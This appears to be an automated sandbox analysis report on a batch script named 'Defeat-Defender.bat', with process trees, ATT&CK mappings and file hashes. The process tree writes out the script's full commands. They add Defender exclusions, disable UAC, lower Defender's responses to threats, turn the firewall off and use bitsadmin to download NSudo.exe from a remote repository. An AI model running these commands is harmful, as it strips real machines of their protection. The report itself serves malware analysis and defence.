Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06-08-2024 19:33
Static task
static1
Behavioral task
behavioral1
Sample
Defeat-Defender-V1.2.0-main/Defeat-Defender.bat
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
Defeat-Defender-V1.2.0-main/Defeat-Defender.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
Defeat-Defender-V1.2.0-main/Enable Smart Screen.bat
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
Defeat-Defender-V1.2.0-main/Enable Smart Screen.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
Defeat-Defender-V1.2.0-main/run.bat
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
Defeat-Defender-V1.2.0-main/run.bat
Resource
win10v2004-20240802-en
General
-
Target
Defeat-Defender-V1.2.0-main/Defeat-Defender.bat
-
Size
3KB
-
MD5
123c7ff359911f5a6bd2cce3f44d68e7
-
SHA1
b0a06f3acd65df1b019e0f8b3e5df81f38bfe06d
-
SHA256
d0684a4f8a1dde0fefa5272d38fd96c21388f0398beff1a2847ff0c021611068
-
SHA512
c164cdba208e518fad16cdd889eabd9128d82b1711aad773ecfe923296a7faef73a8da801ef12f973bd6bd7d76c871d3a3c8765b5e39919315a0eee4d5bf76c2
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3948 powershell.exe 2312 powershell.exe 1580 powershell.exe 3848 powershell.exe 4928 powershell.exe 4000 powershell.exe 4544 powershell.exe 2352 powershell.exe 464 powershell.exe 436 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 3096 netsh.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Checks processor information in registry 2 TTPs 11 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exefirefox.exeEXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 1 IoCs
Processes:
firefox.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings firefox.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4600 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 464 powershell.exe 464 powershell.exe 436 powershell.exe 436 powershell.exe 4876 powershell.exe 4876 powershell.exe 2352 powershell.exe 2352 powershell.exe 3948 powershell.exe 3948 powershell.exe 2312 powershell.exe 2312 powershell.exe 1580 powershell.exe 1580 powershell.exe 3848 powershell.exe 3848 powershell.exe 4928 powershell.exe 4928 powershell.exe 4000 powershell.exe 4000 powershell.exe 4544 powershell.exe 4544 powershell.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exefirefox.exedescription pid process Token: SeDebugPrivilege 464 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 4876 powershell.exe Token: SeDebugPrivilege 2352 powershell.exe Token: SeDebugPrivilege 3948 powershell.exe Token: SeDebugPrivilege 2312 powershell.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeDebugPrivilege 3848 powershell.exe Token: SeDebugPrivilege 4928 powershell.exe Token: SeDebugPrivilege 4000 powershell.exe Token: SeDebugPrivilege 4544 powershell.exe Token: SeDebugPrivilege 2640 firefox.exe Token: SeDebugPrivilege 2640 firefox.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
firefox.exepid process 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
firefox.exepid process 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe 2640 firefox.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEfirefox.exepid process 4600 EXCEL.EXE 4600 EXCEL.EXE 4600 EXCEL.EXE 4600 EXCEL.EXE 4600 EXCEL.EXE 4600 EXCEL.EXE 4600 EXCEL.EXE 4600 EXCEL.EXE 4600 EXCEL.EXE 4600 EXCEL.EXE 4600 EXCEL.EXE 4600 EXCEL.EXE 2640 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exefirefox.exefirefox.exedescription pid process target process PID 4824 wrote to memory of 3708 4824 cmd.exe cacls.exe PID 4824 wrote to memory of 3708 4824 cmd.exe cacls.exe PID 4824 wrote to memory of 1624 4824 cmd.exe wscript.exe PID 4824 wrote to memory of 1624 4824 cmd.exe wscript.exe PID 4824 wrote to memory of 4144 4824 cmd.exe bitsadmin.exe PID 4824 wrote to memory of 4144 4824 cmd.exe bitsadmin.exe PID 4824 wrote to memory of 464 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 464 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 436 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 436 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 4876 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 4876 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 2352 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 2352 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 3948 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 3948 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 2312 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 2312 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 1580 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 1580 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 3848 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 3848 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 4928 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 4928 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 4000 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 4000 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 4544 4824 cmd.exe powershell.exe PID 4824 wrote to memory of 4544 4824 cmd.exe powershell.exe PID 4544 wrote to memory of 3096 4544 powershell.exe netsh.exe PID 4544 wrote to memory of 3096 4544 powershell.exe netsh.exe PID 4532 wrote to memory of 2640 4532 firefox.exe firefox.exe PID 4532 wrote to memory of 2640 4532 firefox.exe firefox.exe PID 4532 wrote to memory of 2640 4532 firefox.exe firefox.exe PID 4532 wrote to memory of 2640 4532 firefox.exe firefox.exe PID 4532 wrote to memory of 2640 4532 firefox.exe firefox.exe PID 4532 wrote to memory of 2640 4532 firefox.exe firefox.exe PID 4532 wrote to memory of 2640 4532 firefox.exe firefox.exe PID 4532 wrote to memory of 2640 4532 firefox.exe firefox.exe PID 4532 wrote to memory of 2640 4532 firefox.exe firefox.exe PID 4532 wrote to memory of 2640 4532 firefox.exe firefox.exe PID 4532 wrote to memory of 2640 4532 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe PID 2640 wrote to memory of 768 2640 firefox.exe firefox.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:3708
-
C:\Windows\system32\wscript.exewscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs2⤵PID:1624
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe2⤵
- Download via BitsAdmin
PID:4144 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force2⤵
- UAC bypass
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4928 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanScheduleDay 8"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3096
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Documents\RestoreAdd.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4600
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4800
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 23602 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60673b37-9128-4018-9bd8-d6073175fef9} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" gpu3⤵PID:768
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2396 -prefsLen 23638 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0634ca4-ec5b-462c-b5df-fa7b30041b7e} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" socket3⤵PID:4692
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 2916 -prefMapHandle 2968 -prefsLen 23779 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cfc42829-52e8-4f35-93a7-c59cbeaf1372} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab3⤵PID:3228
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2744 -childID 2 -isForBrowser -prefsHandle 3700 -prefMapHandle 3696 -prefsLen 29012 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa8c8459-94e9-49ef-b2d8-0c6251b42a25} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab3⤵PID:4980
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4712 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4716 -prefMapHandle 4756 -prefsLen 29012 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46d0ee7c-afd8-4d62-a74f-ee81124ea5d6} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" utility3⤵
- Checks processor information in registry
PID:5580 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -childID 3 -isForBrowser -prefsHandle 5452 -prefMapHandle 5448 -prefsLen 27068 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11539aa5-ffc0-469e-ae2a-70d5f5ee2b4a} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab3⤵PID:6092
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5640 -childID 4 -isForBrowser -prefsHandle 5560 -prefMapHandle 5564 -prefsLen 27068 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b214495-18e7-4d1e-8ab2-67ba649de502} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab3⤵PID:6104
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5764 -childID 5 -isForBrowser -prefsHandle 5760 -prefMapHandle 5768 -prefsLen 27068 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc444eed-2e08-408a-8efa-d3f1868ae8d4} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab3⤵PID:448
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5972 -childID 6 -isForBrowser -prefsHandle 5996 -prefMapHandle 5992 -prefsLen 27211 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec55a889-6c6b-46a5-a0e9-fbd754832f4b} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab3⤵PID:5480
Network
MITRE ATT&CK Enterprise v15
Persistence
BITS Jobs
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
948B
MD5217d9191dfd67252cef23229676c9eda
SHA180d940b01c28e3933b9d68b3e567adc2bac1289f
SHA256e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133
SHA51286767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
64B
MD52bdac358d06bbc173ed9b971328b99be
SHA1b36ae68965e1989c12b33cbbdc873dbcb4863ef7
SHA256b57143f72c786b38102de918ebf9248e1f8b1c13ddb50872d089750d6f12dc73
SHA51250a55652b4214d61f974f060112e7f9635236df05c105e365d9fa87cefb090bd1fd25f968ebdef74a0f9d06a914087dcbb0f5889189e64d8152ad69397bff4c3
-
Filesize
1KB
MD538f0f14cc7ca72ad51216866e66efb4e
SHA134ed0f47a4aaa95e786ca9f125b0341b38bfb9be
SHA256668820fc659c9d229d32731ead41381eca0e5fb57232bbd3ef0118f5a21fc501
SHA5124a7d00c585784cf1aec6ed82d8c78542d2db3b9da30d8db20680a1ee9fd45b697207fbd459557336f2166d8b6ac17016f9e71c61ad351f2915bb163c8ed2b73a
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
944B
MD510890cda4b6eab618e926c4118ab0647
SHA11e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA25600f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221
-
Filesize
948B
MD51aefe566d0c19c9e3ddaf9ea005f71c0
SHA18d8cfb0d2192706100eb241f38a32b31f03329f1
SHA256dc85b671f8ebac6cfa68897b1826019925c95a5ec36676fe18ba0085f437905a
SHA512f22782b33f7990a0783154fbe6d49e03f16c873a3b4c91f1fc5ed76d0e7b88f0df876ccdf007828ba4d9a5f97cb2362f922cbacad03de5804bc8abeb36cb2d09
-
Filesize
948B
MD5083782a87bd50ffc86d70cbc6f04e275
SHA10c11bc2b2c2cf33b17fff5e441881131ac1bee31
SHA2567a54dcc99ebfb850afde560857e2d1f764a53ff09efd03222f56ab547539798f
SHA512a7e56293e07acce20e69dceb13282e5d1eed2ef972a4c9cf1fb4f973b4b7d6a9ca8714fc547ab662842205383891372a2386fc3a12af3d7e4ef6a195f8a2bf02
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\activity-stream.discovery_stream.json.tmp
Filesize18KB
MD586506a4800f7637b54bb829ce57db262
SHA1c36581f315f3a4485d7f2f17b0c999f18441ba2b
SHA2564db2822ab4fc6eb1deaea875060fec7622847cfb01ffd9bba47dadccfb08a394
SHA51237aea1b4605090110e5000bf54ed1c7c95591c6c38a8d1241d2f31abe7c79f17ea37f6bcad7f63cd9f215c9686217fac634d99672ea9c00c26c620d095dbe597
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
112B
MD59313d55e26ad30ddcbc046fe8013a21d
SHA1a5712ce8864d7b0ca88b94c64226dfeb2221457f
SHA256121ab5b57fb09d3c520a7fd6dfaa5b87844e1e8379a9635e7a737934e7e9226a
SHA51277b7f3c2aca2ba61519a9fed7dbb3e7f2dd803bd566eeb9531e1ed038dff68e88c4d2f73a83e37396fd475f57dbdef55966361176dde70d1343747aca5888ba7
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
Filesize
383B
MD56b17eb8d08a33b0d5b71a8dddff6ba01
SHA142de4c02311cd9ddfa4093a3717e2b72f27fea7d
SHA25611faf6d4b3ebc71622cb26c69f77cc905546d8602d47f3dac53edbca65321739
SHA5128111c1719144e9695eb3fe53a57bf3ec53552a535181c79b8d4297fb00c0095eb24fe432a004266df0f4c7091131b94ef7e8b0b4479c748c571b7092fd13f7e1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize3KB
MD5663cf8b6a51e3ccbea23420ccc18c7a5
SHA1b75f0003f5237a6e1d92bbd8b3ec09b46d61e64b
SHA25693c62247bde13e9d81bdc94a4c4b25cdf8f1182a2ce3f71b9a5fad9d06f29dc2
SHA51226a3d419b05f87188bbf2c815e3dbc72c566c26dc922372508719dc1932bce2c369e6b3cc8042c534802ac5e9c517e1a1afa778b52434b9b9ec412244c82ff01
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize3KB
MD5209ccebe007bd02a6ed398b58e396e9a
SHA1efee58463413a6f45f774c0de70ec5804bd98358
SHA256cc51857b0aa3ea42f08ee8a38658bbdeb65c8da9423d361c6743259cba521010
SHA512844ed7757f5c3e4e8fdfc43c7fbb254b228be307f3a6556d15184aed251e3dc7ef9b4d270cba42f219ee74da7bd701250b45e7edbd78be01a9d7784f89c47012
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\AlternateServices.bin
Filesize7KB
MD5a16857bc593b8fe295972e014e976aba
SHA17872314cd27f2bf6c62cbccb48cf3786e766bf12
SHA25620e8b466c7082a5a4bb05a34028d9e0ba60c8d52ec9e3c3e3f4aa7af67ec6755
